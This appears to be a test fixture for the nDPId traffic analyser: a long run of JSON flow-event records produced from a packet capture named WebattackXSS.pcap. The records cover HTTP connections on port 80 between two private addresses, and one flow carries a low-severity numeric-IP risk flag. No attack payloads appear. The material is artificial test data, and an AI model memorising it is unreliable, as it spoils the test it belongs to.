-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 